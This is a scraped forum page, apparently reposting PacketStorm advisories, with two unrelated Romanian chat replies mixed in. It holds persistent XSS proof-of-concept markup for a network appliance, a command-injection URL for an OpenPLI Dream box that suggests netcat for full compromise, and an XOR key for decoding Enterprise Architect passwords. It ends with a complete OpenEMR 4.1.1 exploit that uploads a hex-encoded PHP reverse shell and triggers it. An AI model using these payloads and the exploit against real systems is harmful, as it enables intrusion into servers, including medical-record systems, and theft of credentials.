located in the Alarms > Overview Bulletin Board > Advanced Filters module with the bound vulnerable displayBBAdvFilterModal() - (Policy Name, Board Name, Violators) parameters. The vulnerability allows to inject persistent script code as Policy Name, Board Name and Violator. The result is the persistent execution of script code out of the Policy Name, Board Name and Violator listings. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin), persistent phishing, persistent external redirects to malware or scam and persistent web context manipulation in the affected vulnerable module(s). Exploitation requires low user interaction & a low privileged appliance web application user account. Vulnerable Section(s): [+] Alarm [+] Dashboard [+] MyView (CGI) [+] Admin > Admin [+] Admin > Admin [+] Alarms Vulnerable Module(s): [+] New Board & Policy Manager [+] Flow Expert [+] Value [+] New Users & New Group [+] Mapping / Maps (CGI) - Dashboard Status [+] Overview Bulletin Board > Advanced Filters Vulnerable Parameter(s): [+] Search item - BBSearchText [+] Mytab [+] newName [+] groupName & username - Place in Usergroup - Listing [+] groupMembers, Type, Checkbox Linklike, indexColumn, name, Object Name & settings groups(checkbox) [+] displayBBAdvFilterModal() - (Policy Name, Board Name, Violators) Proof of Concept: ================= The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged application user account and low required user interaction. For demonstration or reproduce ... Review: Alarm > New Board & Policy Manager - [BBSearchText] Search item <td class="textRight agNoWrap"> <input id="BBSearchText" title="Search item" value="<<[PERSISTENT INJECTED SCRIPT CODE!];)" <="""=""></iframe> <input class="button" id="BBSearchButton" value="Search" title="Search" onclick="bbSearch(this)" type="button"> <input class="button" onclick="displayBBAdvFilterModal()" title="Search using multiple criteria" value="Advanced Filters" type="button"> Review: Dashboard > Flow Expert > Mytab - [Mytab Name] <div><span class="myv_tab"><span tid="1" style="margin-left: 10px; margin-right: 10px;">Flow Expert</span></span> <span class="myv_tab"><span tid="2" style="margin-left: 10px; margin-right: 10px;">Configure Flow Analytics</span></span> <span class="myv_tab"><span tid="3" style="margin-left: 10px; margin-right: 10px;">CrossCheck</span></span><span class="myv_tab"> <span tid="4" style="margin-left: 10px; margin-right: 10px;">Example</span></span><span class="myv_tab"><span tid="5" style="margin-left: 10px; margin-right: 10px;">Cisco PfR</span></span><span class="myv_tab"><span tid="6" style="margin-left: 10px; margin-right: 10px;">Training</span></span><span class="myv_selectedtab"><span title="Click to rename" class="jedit" id="tab_7" origname="My New Tab"><[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span> <img style="margin-left: 6px; cursor: pointer;" src="Scrutinizer%20%29%20Dashboard-Dateien/tab-edit.gif"></span><span class="add_tab"> <span style="margin-left: 6px; cursor: pointer;">Add a tab</span></span></div> Review: MyView (CGI) > Value - [newName] <html><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head> <body>{"newName":"<[PERSISTENT INJECTED SCRIPT CODE!]"> \"><[PERSISTENT INJECTED SCRIPT CODE!]") <"}</iframe></body> </html> Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & username - Place in Usergroup - Listing] <div class="unfortunate" style="" id="settingsContent"> <div id="settingsHeader"></div> <div id="settingsOutput"> <title>User Preferences</title> <div id="mainFrame"> <div style="height: 552px;" id="upMenu"><div class="basic ui-accordion selected" style="float:left;" id="upTreeMenu"> <a class="selected"> New User</a><div style="height: 511px; display: block; overflow: hidden;" class="genericAccordionContainer"> <p style="padding-left: 10px;" id="new_user_panel"><label>Username: <input class="newform" id="new_username" type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password"> </label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;" id="up_availGroups"><option value="3"><iframe src="a"> "><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option> <option value="1">Administrators</option><option value="2">Guests</option></select></label>?????<input value="Create User" class="button" style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a><div style="height: 511px; display: none; overflow: hidden;" class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div> Review: Admin > Admin > Mapping/Maps (CGI) - Dashboard Status - [groupMembers, Type, Checkbox Linklike, indexColumn,name,ObjectName & settings groups] <div class="fmapsScroll" id="groupScroll"><table class="dataTable filterable" id="grpTable"><tbody id="grpTbody"><tr id="grpTblHdr"> <th width="20"><input id="checkAllObj" name="checkAllObj" title="Permanently delete groups" type="checkbox"></th><th style="width: 100%;" class="alignLeft">Group Name</th><th width="40">Type</th><th width="40">Membership</th><th width="40">Map Status</th></tr><tr id="grp_tr1"> <td><input title="Permanently delete this object from ALL groups" name="1" type="checkbox"></td><td class="alignLeft"><a title="Click here to edit this group" href="#NA" class="linkLike"><iframe src="a">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...</iframe></a> </td><td>Google</td><td><a title="Click to change object membership for this group" class="linkLike">Membership</a></td><td><select id="pass_1" class="passSel"><option value="0">No Pass</option> <option value="1">Pass Up</option></select></td> <td style="display: none;" class="indexColumn">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...googlemembershipno passpass up</td></tr></tbody></table></div><input style="margin-top: 10px; margin-left: 8px;" id="delObjectBtn" value="Delete" class="button" type="button"><div id="editGrpDiv"><div id="obj_typeForm"><div id="iconPreview"><img src="/images/maps/group16.png" id="previewImage"></div> <div id="toGroupMsg"></div><select style="margin-left: 30px; margin-bottom: 5px; width: 159px;" id="obj_iconSelect" name="icon"><option value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png</option><option value="gicon32.png">gicon32.png</option> <option value="gicon48.png">gicon48.png</option><option value="gicon72.png">gicon72.png</option><option value="group16.png">group16.png</option> <option value="group24.png">group24.png</option><option value="group32.png">group32.png</option><option value="group48.png">group48.png</option> <option value="group72.png">group72.png</option></select></div><table id="editGroupTable" class="dataTable"><tbody><tr id="grpTypeRow"> <td class="alignLeft cellHeader">Type</td><td class="alignLeft"><select id="edit_grpType"><option value="flash">Flash</option> ... <table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr>?????<th style="white-space: nowrap;" nowrap="">Map</th> <th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody> <tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20"> <iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td> ?????<td class="" align="center">-</td></tr></tbody></table> ... <tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20"> </th>?????<th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap=""> Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap=""> <span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object" class="linkLike">Membership</a>?????</td><td style="display: none;" class="indexColumn fmaps_bakTrHi highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody> ... <td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;" id="fmaps_containerTitle" class="titleBar">?????<span style="float:left" ;="">Settings</span><img title="Map Settings Help" src="/images/common/help.png"><select id="fmaps_groupSelect"> <option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google) </iframe></option></select></div>?????<div id="fmaps_confBodyContainer"><div id="defaultsContainer"> ... <li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> ?????<img src="/images/common/gicon.png" gid="1" title="<iframe src=a>%20%20%20%20">?????<iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe> <span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)" gid="1"><iframe src="a">%20%20%20...</span> <ul style="display: none;"> <li>Loading...</li> </ul> </li> <li class='expandable noWrapOver lastExpandable'> <div class='hitarea expandable-hitarea lastExpandable-hitarea'> </div> <img src='/images/common/TreeUngroupGray.png'/><span class="">Ungrouped</span> <ul style="display: none;"> <li class="last"><span class=" ">No Devices</span></li> </ul> </li> </ul> </iframe></span></li> Solution: ========= 2013-02-10: Vendor Fix/Patch Where changing code paths to use bound variables was not practical in such a short timeframe, we pass inputs included in a query through a function that escapes potentially dangerous characters. Risk: ===== The security risk of the persistent input validation web vulnerabilities are estimated as medium(+)|(-)high. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
-
OpenPLI Dream Multimedia Box suffers from cross site scripting and remote OS command injection vulnerabilities. Device Name: OpenPLI - Dream Multimedia Box with OpenPLI software Vendor of device: Dream Multimedia Vendor of Software: OpenPLI Community ============ Device Details: ============ Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011 Firmware release 1.1.0, 27.01.2013 FP Firmware 1.06 Web Interface 6.0.4-Expert - PLi edition by [lite] More infos: http://openpli.org/ ============ Vulnerability Overview: ============ * OS Command Execution: parameter: maxmtu The vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use Netcat to fully compromise the device. http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26&hddstandby=2&hddacoustics=160&timeroffsetstart=0&timeroffsetstop=0&audiochannelspriority=&showsatpos=on&trustedhosts=&epgcachepath=%2Fhdd&epgsqlpath=%2Fvar%2Flib%2Fsqlite It is possible to shorten the URL to the following: http://Target-IP/cgi-bin/setConfigSettings?maxmtu=%26COMMAND%26 There is Netcat preinstalled on the device. It is a very small edition of netcat, so you have to play a bit with it but you will get it * stored XSS: Box Control -> Configuration -> Webserver -> User, Password parameter: AuthUser, AuthPassword Box Control -> Configuration -> Settings parameter: audiochannelspriority Injecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input. ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de Source: PacketStorm
-
Sparx Systems Enterprise Architect version 9.3.931 stores user passwords in the database simply XORed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function. Subject ======= Simple password obfuscation in Sparx Systems "Enterprise Architect" when using server based repositories Affected product ================ Product: Enterprise Architect Vendor: Sparx Systems Affected versions ================= Tested with 9.3.931 Corporate, other versions likely to be affected too. Description =========== When using server based repositories in Enterprise Architect the user account information is stored in the database table t_secuser. The column "Password" contains the user password in an obfuscated format. The content is simply the user password XOR'ed with the ASCII code of 'E17030402158' instead of using a generally accepted hash function. Hence everyone with access to the database (which is in general every user with access to the repository) is able to decode the passwords of all other users. Impact ====== Disclosure of user passwords. Possible mitigating factors =========================== Beginning with version 7.1 Enterprise Architect offers a feature where project owners can provide users with a shortcut to the project that contains the database connection string in an encrypted format. This should avoid the need to reveal database access credentials to end users. Conclusion ========== Everyone with access to the database containing the repository is able to decode the passwords of all users. Irrespective of the fact that ordinary end users may be detained from gaining access to the database using the "Encrypt Connection String" feature, at least SQL admins may still read the t_secuser table and are therefore able decode the passwords. Chronology ========== Vendor informed: 2012/01/28 Vendor reminded: 2012/02/06 Vender response: 2012/02/07 Summary of vendor response: - "We are aware of these limitations" - "No fixes are scheduled at this time." Released to public: 2012/02/12 Reported by =========== Holm Diening Dept. Privacy and Information Security E-Mail: holm.diening@gematik.de www.gematik.de gematik Gesellschaft für Telematikanwendungen der Gesundheitskarte mbH Friedrichstraße 136 10117 Berlin Amtsgericht Berlin-Charlottenburg HRB 96351 B Geschäftsführer: Prof. Dr. Arno Elmer Source: PacketStorm
-
Ai destui 'priceputi', acum ca oferiti si servicii
-
Da' ce sunt eu? Traducator? Ce ar fi sa traduc fiecare post pe care il fac? Du-te pe la scoala, invata putina engleza, in caz ca nu iti iese, google iti este prieten. Figuranti
-
OpenEMR version 4.1.1 suffers from an arbitrary file upload vulnerability in ofc_upload_image.php. Included is an exploit that triggers a reverse shell. ?<?php /* OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability Vendor: OpenEMR Product web page: http://www.open-emr.org Affected version: 4.1.1 Summary: OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run on Windows, Linux, Mac OS X, and many other platforms. Desc: The vulnerability is caused due to the improper verification of uploaded files in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script thru the 'name' parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script with multiple extensions. ================================================================================ /library/openflashchart/php-ofc-library/ofc_upload_image.php: ------------------------------------------------------------- 21: $default_path = '../tmp-upload-images/'; 23: if (!file_exists($default_path)) mkdir($default_path, 0777, true); 26: $destination = $default_path . basename( $_GET[ 'name' ] ); 28: echo 'Saving your image to: '. $destination; 39: $jfh = fopen($destination, 'w') or die("can't open file"); 40: fwrite($jfh, $HTTP_RAW_POST_DATA); 41: fclose($jfh); 46: exit(); ================================================================================ Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Fedora Linux Apache2, PHP 5.4 MySQL 5.5 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5126 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php 09.02.2013 */ error_reporting(0); set_time_limit(0); $go = "\033[0;92m"; $no = "\033[0;37m"; echo $no; $host = $argv[1]; $sock = fsockopen($host, 80, $errno, $errstr, 30); if(!$sock) { echo "\n> $errstr ($errno)\n"; die(); } function r_shell($sc) { for($z = 0; $z < strlen($sc); $z += 2) $exec .= chr(hexdec(substr($sc,$z,2))); return $exec; } print "\n+--------------------------------------------------------+"; print "\n+ +"; print "\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth) +"; print "\n+ +"; print "\n+ ID: ZSL-2013-5126 +"; print "\n+ +"; print "\n+ Copyleft (c) 2013, Zero Science Lab +"; print "\n+ +"; print "\n+--------------------------------------------------------+\n\n"; // PoC for Linux // Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234 if ($argc < 2) { print "\n> Usage: php $argv[0] <target>\n\n"; die(); } $pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974". "202830293b0d0a". "246970203d2027". "3132372e302e30". "2e31273b0d0a24". "706f7274203d20". "313233343b0d0a". "246368756e6b5f". "73697a65203d20". "313430303b0d0a". "2477726974655f". "61203d206e756c". "6c3b2024657272". "6f725f61203d20". "6e756c6c3b0d0a". "247368656c6c20". "3d2027756e616d". "65202d613b2077". "3b2069643b202f". "62696e2f736820". "2d69273b0d0a24". "6461656d6f6e20". "3d20303b202464". "65627567203d20". "303b0d0a696620". "2866756e637469". "6f6e5f65786973". "7473282770636e". "746c5f666f726b". "272929207b0d0a". "24706964203d20". "70636e746c5f66". "6f726b28293b0d". "0a696620282470". "6964203d3d202d". "3129207b0d0a70". "72696e74697428". "224552524f523a". "2043616e277420". "666f726b22293b". "20657869742831". "293b7d0d0a6966". "20282470696429". "207b6578697428". "30293b7d0d0a69". "662028706f7369". "785f7365747369". "642829203d3d20". "2d3129207b0d0a". "7072696e746974". "28224572726f72". "3a2043616e2774". "20736574736964". "282922293b2065". "7869742831293b". "7d0d0a24646165". "6d6f6e203d2031". "3b7d20656c7365". "207b0d0a707269". "6e746974282257". "41524e494e473a". "204661696c6564". "20746f20646165". "6d6f6e6973652e". "20205468697320". "69732071756974". "6520636f6d6d6f". "6e20616e64206e". "6f742066617461". "6c2e22293b7d0d". "0a636864697228". "222f22293b2075". "6d61736b283029". "3b0d0a24736f63". "6b203d2066736f". "636b6f70656e28". "2469702c202470". "6f72742c202465". "72726e6f2c2024". "6572727374722c". "203330293b0d0a". "69662028212473". "6f636b29207b0d". "0a7072696e7469". "74282224657272". "73747220282465". "72726e6f292229". "3b206578697428". "31293b7d0d0a24". "64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270". "697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d". "0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d". "2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470". "69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d". "0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d". "0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573". "5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31". "5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c". "2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a". "7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073". "68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620". "2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c". "20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620". "2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053". "68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472". "6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573". "5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73". "656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c". "6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a". "6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e". "707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028". "24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269". "7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928". "2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072". "696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428". "2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920". "7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f". "636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c". "2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444". "455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c". "20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253". "54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574". "293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d". "293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b". "325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20". "7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070". "72696e74202224737472696e675c6e223b7d7d0d0a3f3e"); //PHP Reverse Shell, PTMNKY. echo "\n> Writing reverse shell file"; $pckt = "POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\r\n"; $pckt .= "Host: {$host}\r\n"; $pckt .= "Content-Length: ".strlen($pl)."\r\n\r\n{$pl}"; fputs($sock, $pckt); sleep (2); print " ...."; echo $go."[OK]"; echo $no; echo "\n> Calling your listener"; $pckt = "GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\r\n"; $pckt .= "Host: {$host}\r\n"; $pckt .= "Connection: Keep-Alive\r\n\r\n"; fputs($sock, $pckt); sleep (2); print " ........."; echo $go."[OK]"; echo $no."\n"; // interact_sh(); echo "\n> Enjoy!\n\n"; ?> Source: PacketStorm